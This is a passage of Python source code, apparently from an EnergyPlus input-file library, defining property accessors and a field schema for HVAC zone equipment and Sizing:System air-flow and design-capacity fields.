def no_load_supply_air_flow_rate_per_floor_area(self):
"""field `No Load Supply Air Flow Rate Per Floor Area`
| Enter the supply air volume flow rate per total floor area.
| Required field when No Load Supply Air Flow Rate Method
| is FlowPerFloorArea.
| Units: m3/s-m2
Args:
value (float): value for IDD Field `No Load Supply Air Flow Rate Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `no_load_supply_air_flow_rate_per_floor_area` or None if not set
"""
return self["No Load Supply Air Flow Rate Per Floor Area"]
@no_load_supply_air_flow_rate_per_floor_area.setter
def no_load_supply_air_flow_rate_per_floor_area(self, value=None):
"""Corresponds to IDD field `No Load Supply Air Flow Rate Per Floor
Area`"""
self["No Load Supply Air Flow Rate Per Floor Area"] = value
@property
def no_load_fraction_of_cooling_supply_air_flow_rate(self):
"""field `No Load Fraction of Cooling Supply Air Flow Rate`
| Enter the supply air volume flow rate as a fraction of the cooling supply air flow rate.
| Required field when No Load Supply Air Flow Rate Method
| is FractionOfAutosizedCoolingAirflow.
Args:
value (float): value for IDD Field `No Load Fraction of Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `no_load_fraction_of_cooling_supply_air_flow_rate` or None if not set
"""
return self["No Load Fraction of Cooling Supply Air Flow Rate"]
@no_load_fraction_of_cooling_supply_air_flow_rate.setter
def no_load_fraction_of_cooling_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Load Fraction of Cooling Supply Air
Flow Rate`"""
self["No Load Fraction of Cooling Supply Air Flow Rate"] = value
@property
def no_load_fraction_of_heating_supply_air_flow_rate(self):
"""field `No Load Fraction of Heating Supply Air Flow Rate`
| Enter the supply air volume flow rate as a fraction of the heating supply air flow rate.
| Required field when No Load Supply Air Flow Rate Method
| is FractionOfAutosizedHeatingAirflow.
Args:
value (float): value for IDD Field `No Load Fraction of Heating Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `no_load_fraction_of_heating_supply_air_flow_rate` or None if not set
"""
return self["No Load Fraction of Heating Supply Air Flow Rate"]
@no_load_fraction_of_heating_supply_air_flow_rate.setter
def no_load_fraction_of_heating_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Load Fraction of Heating Supply Air
Flow Rate`"""
self["No Load Fraction of Heating Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate_method(self):
"""field `Heating Supply Air Flow Rate Method`
| Enter the method used to determine the heating supply air volume flow rate.
| None is used when a heating coil is not included in the Zone HVAC Equipment or this field may
| be blank. SupplyAirFlowRate => selected when the magnitude of the heating supply air volume
| flow rate is specified. FlowPerFloorArea => selected when the supply air volume flow rate is
| determined from total floor area served by a Zone HVAC unit and user specified value of Flow
| Per Floor Area. FractionOfAutosizedHeatingAirflow => is selected when the supply air volume
| is determined from a user specified fraction and the Autosized heating supply air flow rate
| value determined by the simulation. FlowPerHeatingCapacity => is selected when the supply
| air volume is determined from user specified flow per Heating Capacity and Heating Capacity
| determined by the simulation.
| Default value: SupplyAirFlowRate
Args:
value (str): value for IDD Field `Heating Supply Air Flow Rate Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_supply_air_flow_rate_method` or None if not set
"""
return self["Heating Supply Air Flow Rate Method"]
@heating_supply_air_flow_rate_method.setter
def heating_supply_air_flow_rate_method(self, value="SupplyAirFlowRate"):
"""Corresponds to IDD field `Heating Supply Air Flow Rate Method`"""
self["Heating Supply Air Flow Rate Method"] = value
@property
def heating_supply_air_flow_rate(self):
"""field `Heating Supply Air Flow Rate`
| Enter the magnitude of the supply air volume flow rate during heating operation.
| Required field when Heating Supply Air Flow Rate Method is SupplyAirFlowRate.
| This field may be blank if a heating coil is not included in the Zone HVAC equipment.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Heating Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_supply_air_flow_rate` or None if not set
"""
return self["Heating Supply Air Flow Rate"]
@heating_supply_air_flow_rate.setter
def heating_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate`"""
self["Heating Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate_per_floor_area(self):
"""field `Heating Supply Air Flow Rate Per Floor Area`
| Enter the heating supply air volume flow rate per total conditioned floor area.
| Required field when Heating Supply Air Flow Rate Method is FlowPerFloorArea.
| This field may be blank if a heating coil is not included in the Zone HVAC equipment.
| Units: m3/s-m2
Args:
value (float): value for IDD Field `Heating Supply Air Flow Rate Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_supply_air_flow_rate_per_floor_area` or None if not set
"""
return self["Heating Supply Air Flow Rate Per Floor Area"]
@heating_supply_air_flow_rate_per_floor_area.setter
def heating_supply_air_flow_rate_per_floor_area(self, value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate Per Floor
Area`"""
self["Heating Supply Air Flow Rate Per Floor Area"] = value
@property
def heating_fraction_of_heating_supply_air_flow_rate(self):
"""field `Heating Fraction of Heating Supply Air Flow Rate`
| Enter the supply air volume flow rate as a fraction of the heating supply air flow rate.
| Required field when Heating Supply Air Flow Rate Method is
| FractionOfAutosizedHeatingAirflow.
| This field may be blank if a heating coil is not included in the Zone HVAC equipment.
Args:
value (float): value for IDD Field `Heating Fraction of Heating Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_fraction_of_heating_supply_air_flow_rate` or None if not set
"""
return self["Heating Fraction of Heating Supply Air Flow Rate"]
@heating_fraction_of_heating_supply_air_flow_rate.setter
def heating_fraction_of_heating_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Fraction of Heating Supply Air
Flow Rate`"""
self["Heating Fraction of Heating Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate_per_unit_heating_capacity(self):
"""field `Heating Supply Air Flow Rate Per Unit Heating Capacity`
| Enter the supply air volume flow rate per unit heating capacity.
| Required field when Heating Supply Air Flow Rate Method is
| FlowPerHeatingCapacity.
| This field may be blank if a heating coil is not included in the Zone HVAC equipment.
| Units: m3/s-W
Args:
value (float): value for IDD Field `Heating Supply Air Flow Rate Per Unit Heating Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_supply_air_flow_rate_per_unit_heating_capacity` or None if not set
"""
return self["Heating Supply Air Flow Rate Per Unit Heating Capacity"]
@heating_supply_air_flow_rate_per_unit_heating_capacity.setter
def heating_supply_air_flow_rate_per_unit_heating_capacity(
self,
value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate Per Unit
Heating Capacity`"""
self["Heating Supply Air Flow Rate Per Unit Heating Capacity"] = value
@property
def cooling_design_capacity_method(self):
"""field `Cooling Design Capacity Method`
| Enter the method used to determine the cooling design capacity for scalable sizing.
| None is used when a cooling coils is not included in the Zone HVAC Equipment or
| this field may be blank. If this input field is left blank, then the design cooling
| capacity is set to zero. CoolingDesignCapacity => selected when the design cooling capacity
| value is specified or auto-sized. CapacityPerFloorArea => selected when the design cooling
| capacity is determine from user specified cooling capacity per floor area and zone floor area.
| FractionOfAutosizedCoolingCapacity => is selected when the design cooling capacity is
| determined from a user specified fraction and the auto-sized design cooling capacity.
| Default value: None
Args:
value (str): value for IDD Field `Cooling Design Capacity Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_design_capacity_method` or None if not set
"""
return self["Cooling Design Capacity Method"]
@cooling_design_capacity_method.setter
def cooling_design_capacity_method(self, value="None"):
"""Corresponds to IDD field `Cooling Design Capacity Method`"""
self["Cooling Design Capacity Method"] = value
@property
def cooling_design_capacity(self):
"""field `Cooling Design Capacity`
| Enter the design cooling capacity. Required field when the cooling design capacity method
| CoolingDesignCapacity.
| Units: W
Args:
value (float or "Autosize"): value for IDD Field `Cooling Design Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_design_capacity` or None if not set
"""
return self["Cooling Design Capacity"]
@cooling_design_capacity.setter
def cooling_design_capacity(self, value=None):
"""Corresponds to IDD field `Cooling Design Capacity`"""
self["Cooling Design Capacity"] = value
@property
def cooling_design_capacity_per_floor_area(self):
"""field `Cooling Design Capacity Per Floor Area`
| Enter the cooling design capacity per zone floor area. Required field when the cooling design
| capacity method field is CapacityPerFloorArea.
| Units: W/m2
Args:
value (float): value for IDD Field `Cooling Design Capacity Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_design_capacity_per_floor_area` or None if not set
"""
return self["Cooling Design Capacity Per Floor Area"]
@cooling_design_capacity_per_floor_area.setter
def cooling_design_capacity_per_floor_area(self, value=None):
"""Corresponds to IDD field `Cooling Design Capacity Per Floor Area`"""
self["Cooling Design Capacity Per Floor Area"] = value
@property
def fraction_of_autosized_cooling_design_capacity(self):
"""field `Fraction of Autosized Cooling Design Capacity`
| Enter the fraction of auto-sized cooling design capacity. Required field when the cooling
| design capacity method field is FractionOfAutosizedCoolingCapacity.
Args:
value (float): value for IDD Field `Fraction of Autosized Cooling Design Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `fraction_of_autosized_cooling_design_capacity` or None if not set
"""
return self["Fraction of Autosized Cooling Design Capacity"]
@fraction_of_autosized_cooling_design_capacity.setter
def fraction_of_autosized_cooling_design_capacity(self, value=None):
"""Corresponds to IDD field `Fraction of Autosized Cooling Design
Capacity`"""
self["Fraction of Autosized Cooling Design Capacity"] = value
@property
def heating_design_capacity_method(self):
"""field `Heating Design Capacity Method`
| Enter the method used to determine the heating design capacity for scalable sizing.
| None is used when a heating coil is not included in the Zone HVAC Equipment or
| this field may be blank. If this input field is left blank, then the design heating
| capacity is set to zero. HeatingDesignCapacity => selected when the design heating capacity
| value is specified or auto-sized. CapacityPerFloorArea => selected when the design cooling
| capacity is determine from user specified heating capacity per flow area and zone floor area.
| FractionOfAutosizedHeatingCapacity => is selected when the design heating capacity is
| determined from a user specified fraction and the auto-sized design heating capacity
| Default value: None
Args:
value (str): value for IDD Field `Heating Design Capacity Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_design_capacity_method` or None if not set
"""
return self["Heating Design Capacity Method"]
@heating_design_capacity_method.setter
def heating_design_capacity_method(self, value="None"):
"""Corresponds to IDD field `Heating Design Capacity Method`"""
self["Heating Design Capacity Method"] = value
@property
def heating_design_capacity(self):
"""field `Heating Design Capacity`
| Enter the design heating capacity. Required field when the heating design capacity method
| HeatingDesignCapacity.
| Units: W
Args:
value (float or "Autosize"): value for IDD Field `Heating Design Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_design_capacity` or None if not set
"""
return self["Heating Design Capacity"]
@heating_design_capacity.setter
def heating_design_capacity(self, value=None):
"""Corresponds to IDD field `Heating Design Capacity`"""
self["Heating Design Capacity"] = value
@property
def heating_design_capacity_per_floor_area(self):
"""field `Heating Design Capacity Per Floor Area`
| Enter the heating design capacity per zone floor area. Required field when the heating design
| capacity method field is CapacityPerFloorArea.
| Units: W/m2
Args:
value (float): value for IDD Field `Heating Design Capacity Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_design_capacity_per_floor_area` or None if not set
"""
return self["Heating Design Capacity Per Floor Area"]
@heating_design_capacity_per_floor_area.setter
def heating_design_capacity_per_floor_area(self, value=None):
"""Corresponds to IDD field `Heating Design Capacity Per Floor Area`"""
self["Heating Design Capacity Per Floor Area"] = value
@property
def fraction_of_autosized_heating_design_capacity(self):
"""field `Fraction of Autosized Heating Design Capacity`
| Enter the fraction of auto-sized heating design capacity. Required field when capacity the
| heating design capacity method field is FractionOfAutosizedHeatingCapacity.
Args:
value (float): value for IDD Field `Fraction of Autosized Heating Design Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `fraction_of_autosized_heating_design_capacity` or None if not set
"""
return self["Fraction of Autosized Heating Design Capacity"]
@fraction_of_autosized_heating_design_capacity.setter
def fraction_of_autosized_heating_design_capacity(self, value=None):
"""Corresponds to IDD field `Fraction of Autosized Heating Design
Capacity`"""
self["Fraction of Autosized Heating Design Capacity"] = value
class SizingSystem(DataObject):
""" Corresponds to IDD object `Sizing:System`
Specifies the input needed to perform sizing calculations for a central forced air
system. System design air flow, heating capacity, and cooling capacity will be calculated
using this input data.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'airloop name',
{'name': u'AirLoop Name',
'pyname': u'airloop_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'type of load to size on',
{'name': u'Type of Load to Size On',
'pyname': u'type_of_load_to_size_on',
'default': u'Sensible',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Sensible',
u'Total',
u'VentilationRequirement'],
'autocalculatable': False,
'type': 'alpha'}),
(u'design outdoor air flow rate',
{'name': u'Design Outdoor Air Flow Rate',
'pyname': u'design_outdoor_air_flow_rate',
'default': 'autosize',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'central heating maximum system air flow ratio',
{'name': u'Central Heating Maximum System Air Flow Ratio',
'pyname': u'central_heating_maximum_system_air_flow_ratio',
'default': 0.5,
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'preheat design temperature',
{'name': u'Preheat Design Temperature',
'pyname': u'preheat_design_temperature',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'preheat design humidity ratio',
{'name': u'Preheat Design Humidity Ratio',
'pyname': u'preheat_design_humidity_ratio',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kgWater/kgDryAir'}),
(u'precool design temperature',
{'name': u'Precool Design Temperature',
'pyname': u'precool_design_temperature',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'precool design humidity ratio',
{'name': u'Precool Design Humidity Ratio',
'pyname': u'precool_design_humidity_ratio',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kgWater/kgDryAir'}),
(u'central cooling design supply air temperature',
{'name': u'Central Cooling Design Supply Air Temperature',
'pyname': u'central_cooling_design_supply_air_temperature',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'central heating design supply air temperature',
{'name': u'Central Heating Design Supply Air Temperature',
'pyname': u'central_heating_design_supply_air_temperature',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'type of zone sum to use',
{'name': u'Type of Zone Sum to Use',
'pyname': u'type_of_zone_sum_to_use',
'default': u'NonCoincident',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coincident',
u'NonCoincident'],
'autocalculatable': False,
'type': 'alpha'}),
(u'100% outdoor air in cooling',
{'name': u'100% Outdoor Air in Cooling',
'pyname': u'a_100_outdoor_air_in_cooling',
'default': u'No',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Yes',
u'No'],
'autocalculatable': False,
'type': 'alpha'}),
(u'100% outdoor air in heating',
{'name': u'100% Outdoor Air in Heating',
'pyname': u'a_100_outdoor_air_in_heating',
'default': u'No',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Yes',
u'No'],
'autocalculatable': False,
'type': 'alpha'}),
(u'central cooling design supply air humidity ratio',
{'name': u'Central Cooling Design Supply Air Humidity Ratio',
'pyname': u'central_cooling_design_supply_air_humidity_ratio',
'default': 0.008,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kgWater/kgDryAir'}),
(u'central heating design supply air humidity ratio',
{'name': u'Central Heating Design Supply Air Humidity Ratio',
'pyname': u'central_heating_design_supply_air_humidity_ratio',
'default': 0.008,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kgWater/kgDryAir'}),
(u'cooling supply air flow rate method',
{'name': u'Cooling Supply Air Flow Rate Method',
'pyname': u'cooling_supply_air_flow_rate_method',
'default': u'DesignDay',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Flow/System',
u'DesignDay',
u'FlowPerFloorArea',
u'FractionOfAutosizedCoolingAirflow',
u'FlowPerCoolingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling supply air flow rate',
{'name': u'Cooling Supply Air Flow Rate',
'pyname': u'cooling_supply_air_flow_rate',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'cooling supply air flow rate per floor area',
{'name': u'Cooling Supply Air Flow Rate Per Floor Area',
'pyname': u'cooling_supply_air_flow_rate_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-m2'}),
(u'cooling fraction of autosized cooling supply air flow rate',
{'name': u'Cooling Fraction of Autosized Cooling Supply Air Flow Rate',
'pyname': u'cooling_fraction_of_autosized_cooling_supply_air_flow_rate',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'cooling supply air flow rate per unit cooling capacity',
{'name': u'Cooling Supply Air Flow Rate Per Unit Cooling Capacity',
'pyname': u'cooling_supply_air_flow_rate_per_unit_cooling_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-W'}),
(u'heating supply air flow rate method',
{'name': u'Heating Supply Air Flow Rate Method',
'pyname': u'heating_supply_air_flow_rate_method',
'default': u'DesignDay',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Flow/System',
u'DesignDay',
u'FlowPerFloorArea',
u'FractionOfAutosizedHeatingAirflow',
u'FractionOfAutosizedCoolingAirflow',
u'FlowPerCoolingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating supply air flow rate',
{'name': u'Heating Supply Air Flow Rate',
'pyname': u'heating_supply_air_flow_rate',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating supply air flow rate per floor area',
{'name': u'Heating Supply Air Flow Rate Per Floor Area',
'pyname': u'heating_supply_air_flow_rate_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-m2'}),
(u'heating fraction of autosized heating supply air flow rate',
{'name': u'Heating Fraction of Autosized Heating Supply Air Flow Rate',
'pyname': u'heating_fraction_of_autosized_heating_supply_air_flow_rate',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'heating fraction of autosized cooling supply air flow rate',
{'name': u'Heating Fraction of Autosized Cooling Supply Air Flow Rate',
'pyname': u'heating_fraction_of_autosized_cooling_supply_air_flow_rate',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'heating supply air flow rate per unit heating capacity',
{'name': u'Heating Supply Air Flow Rate Per Unit Heating Capacity',
'pyname': u'heating_supply_air_flow_rate_per_unit_heating_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-W'}),
(u'system outdoor air method',
{'name': u'System Outdoor Air Method',
'pyname': u'system_outdoor_air_method',
'default': u'ZoneSum',
'required-field': False,
'autosizable': False,
'accepted-values': [u'ZoneSum',
u'VentilationRateProcedure'],
'autocalculatable': False,
'type': 'alpha'}),
(u'zone maximum outdoor air fraction',
{'name': u'Zone Maximum Outdoor Air Fraction',
'pyname': u'zone_maximum_outdoor_air_fraction',
'default': 1.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'cooling design capacity method',
{'name': u'Cooling Design Capacity Method',
'pyname': u'cooling_design_capacity_method',
'default': u'CoolingDesignCapacity',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'CoolingDesignCapacity',
u'CapacityPerFloorArea',
u'FractionOfAutosizedCoolingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling design capacity',
{'name': u'Cooling Design Capacity',
'pyname': u'cooling_design_capacity',
'default': 'autosize',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W'}),
(u'cooling design capacity per floor area',
{'name': u'Cooling Design Capacity Per Floor Area',
'pyname': u'cooling_design_capacity_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m2'}),
(u'fraction of autosized cooling design capacity',
{'name': u'Fraction of Autosized Cooling Design Capacity',
'pyname': u'fraction_of_autosized_cooling_design_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'heating design capacity method',
{'name': u'Heating Design Capacity Method',
'pyname': u'heating_design_capacity_method',
'default': u'HeatingDesignCapacity',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'HeatingDesignCapacity',
u'CapacityPerFloorArea',
u'FractionOfAutosizedHeatingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating design capacity',
{'name': u'Heating Design Capacity',
'pyname': u'heating_design_capacity',
'default': 'autosize',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W'}),
(u'heating design capacity per floor area',
{'name': u'Heating Design Capacity Per Floor Area',
'pyname': u'heating_design_capacity_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m2'}),
(u'fraction of autosized heating design capacity',
{'name': u'Fraction of Autosized Heating Design Capacity',
'pyname': u'fraction_of_autosized_heating_design_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'central cooling capacity control method',
{'name': u'Central Cooling Capacity Control Method',
'pyname': u'central_cooling_capacity_control_method',
'default': u'OnOff',
'required-field': False,
'autosizable': False,
'accepted-values': [u'VAV',
u'Bypass',
u'VT',
u'OnOff'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'HVAC Design Objects',
'min-fields': 37,
'name': u'Sizing:System',
'pyname': u'SizingSystem',
'required-object': False,
'unique-object': False}
@property
def airloop_name(self):
"""field `AirLoop Name`
Args:
value (str): value for IDD Field `AirLoop Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `airloop_name` or None if not set
"""
return self["AirLoop Name"]
@airloop_name.setter
def airloop_name(self, value=None):
"""Corresponds to IDD field `AirLoop Name`"""
self["AirLoop Name"] = value
@property
def type_of_load_to_size_on(self):
"""field `Type of Load to Size On`
| Specifies the basis for sizing the system supply air flow rate
| Sensible and VentilationRequirement are the only available options
| Sensible uses the zone design air flow rates
| VentilationRequirement uses the system ventilation requirement
| Default value: Sensible
Args:
value (str): value for IDD Field `Type of Load to Size On`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `type_of_load_to_size_on` or None if not set
"""
return self["Type of Load to Size On"]
@type_of_load_to_size_on.setter
def type_of_load_to_size_on(self, value="Sensible"):
"""Corresponds to IDD field `Type of Load to Size On`"""
self["Type of Load to Size On"] = value
@property
def design_outdoor_air_flow_rate(self):
"""field `Design Outdoor Air Flow Rate`
| Units: m3/s
| Default value: "autosize"
Args:
value (float or "Autosize"): value for IDD Field `Design Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `design_outdoor_air_flow_rate` or None if not set
"""
return self["Design Outdoor Air Flow Rate"]
@design_outdoor_air_flow_rate.setter
def design_outdoor_air_flow_rate(self, value="autosize"):
"""Corresponds to IDD field `Design Outdoor Air Flow Rate`"""
self["Design Outdoor Air Flow Rate"] = value
@property
def central_heating_maximum_system_air_flow_ratio(self):
"""field `Central Heating Maximum System Air Flow Ratio`
| Default value: 0.5
| value <= 1.0
Args:
value (float): value for IDD Field `Central Heating Maximum System Air Flow Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `central_heating_maximum_system_air_flow_ratio` or None if not set
"""
return self["Central Heating Maximum System Air Flow Ratio"]
@central_heating_maximum_system_air_flow_ratio.setter
def central_heating_maximum_system_air_flow_ratio(self, value=0.5):
"""Corresponds to IDD field `Central Heating Maximum System Air Flow
Ratio`"""
self["Central Heating Maximum System Air Flow Ratio"] = value
@property
def preheat_design_temperature(self):
"""field `Preheat Design Temperature`
| Units: C
Args:
value (float): value for IDD Field `Preheat Design Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `preheat_design_temperature` or None if not set
"""
return self["Preheat Design Temperature"]
@preheat_design_temperature.setter
def preheat_design_temperature(self, value=None):
"""Corresponds to IDD field `Preheat Design Temperature`"""
self["Preheat Design Temperature"] = value
@property
def preheat_design_humidity_ratio(self):
"""field `Preheat Design Humidity Ratio`
| Units: kgWater/kgDryAir
Args:
value (float): value for IDD Field `Preheat Design Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `preheat_design_humidity_ratio` or None if not set
"""
return self["Preheat Design Humidity Ratio"]
@preheat_design_humidity_ratio.setter
def preheat_design_humidity_ratio(self, value=None):
"""Corresponds to IDD field `Preheat Design Humidity Ratio`"""
self["Preheat Design Humidity Ratio"] = value
@property
def precool_design_temperature(self):
"""field `Precool Design Temperature`
| Units: C
Args:
value (float): value for IDD Field `Precool Design Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `precool_design_temperature` or None if not set
"""
return self["Precool Design Temperature"]
@precool_design_temperature.setter
def precool_design_temperature(self, value=None):
"""Corresponds to IDD field `Precool Design Temperature`"""
self["Precool Design Temperature"] = value
@property
def precool_design_humidity_ratio(self):
"""field `Precool Design Humidity Ratio`
| Units: kgWater/kgDryAir
Args:
value (float): value for IDD Field `Precool Design Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `precool_design_humidity_ratio` or None if not set
"""
return self["Precool Design Humidity Ratio"]
@precool_design_humidity_ratio.setter
def precool_design_humidity_ratio(self, value=None):
"""Corresponds to IDD field `Precool Design Humidity Ratio`"""
self["Precool Design Humidity Ratio"] = value
@property
def central_cooling_design_supply_air_temperature(self):
"""field `Central Cooling Design Supply Air Temperature`
| Units: C
Args:
value (float): value for IDD Field `Central Cooling Design Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `central_cooling_design_supply_air_temperature` or None if not set
"""
return self["Central Cooling Design Supply Air Temperature"]
@central_cooling_design_supply_air_temperature.setter
def central_cooling_design_supply_air_temperature(self, value=None):
"""Corresponds to IDD field `Central Cooling Design Supply Air
Temperature`"""
self["Central Cooling Design Supply Air Temperature"] = value
@property
def central_heating_design_supply_air_temperature(self):
"""field `Central Heating Design Supply Air Temperature`
| Units: C
Args:
value (float): value for IDD Field `Central Heating Design Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `central_heating_design_supply_air_temperature` or None if not set
"""
return self["Central Heating Design Supply Air Temperature"]
@central_heating_design_supply_air_temperature.setter
def central_heating_design_supply_air_temperature(self, value=None):
"""Corresponds to IDD field `Central Heating Design Supply Air
Temperature`"""
self["Central Heating Design Supply Air Temperature"] = value
@property
def type_of_zone_sum_to_use(self):
"""field `Type of Zone Sum to Use`
| Default value: NonCoincident
Args:
value (str): value for IDD Field `Type of Zone Sum to Use`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `type_of_zone_sum_to_use` or None if not set
"""
return self["Type of Zone Sum to Use"]
@type_of_zone_sum_to_use.setter
def type_of_zone_sum_to_use(self, value="NonCoincident"):
"""Corresponds to IDD field `Type of Zone Sum to Use`"""
self["Type of Zone Sum to Use"] = value
@property
def a_100_outdoor_air_in_cooling(self):
"""field `100% Outdoor Air in Cooling`
| Default value: No
Args:
value (str): value for IDD Field `100% Outdoor Air in Cooling`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `a_100_outdoor_air_in_cooling` or None if not set
"""
return self["100% Outdoor Air in Cooling"]
@a_100_outdoor_air_in_cooling.setter
def a_100_outdoor_air_in_cooling(self, value="No"):
"""Corresponds to IDD field `100% Outdoor Air in Cooling`"""
self["100% Outdoor Air in Cooling"] = value
@property
def a_100_outdoor_air_in_heating(self):
"""field `100% Outdoor Air in Heating`
| Default value: No
Args:
value (str): value for IDD Field `100% Outdoor Air in Heating`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `a_100_outdoor_air_in_heating` or None if not set
"""
return self["100% Outdoor Air in Heating"]
@a_100_outdoor_air_in_heating.setter
def a_100_outdoor_air_in_heating(self, value="No"):
"""Corresponds to IDD field `100% Outdoor Air in Heating`"""
self["100% Outdoor Air in Heating"] = value
@property
def central_cooling_design_supply_air_humidity_ratio(self):
"""field `Central Cooling Design Supply Air Humidity Ratio`
| Units: kgWater/kgDryAir
| Default value: 0.008
Args:
value (float): value for IDD Field `Central Cooling Design Supply Air Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `central_cooling_design_supply_air_humidity_ratio` or None if not set
"""
return self["Central Cooling Design Supply Air Humidity Ratio"]
@central_cooling_design_supply_air_humidity_ratio.setter
def central_cooling_design_supply_air_humidity_ratio(self, value=0.008):
"""Corresponds to IDD field `Central Cooling Design Supply Air Humidity
Ratio`"""
self["Central Cooling Design Supply Air Humidity Ratio"] = value
@property
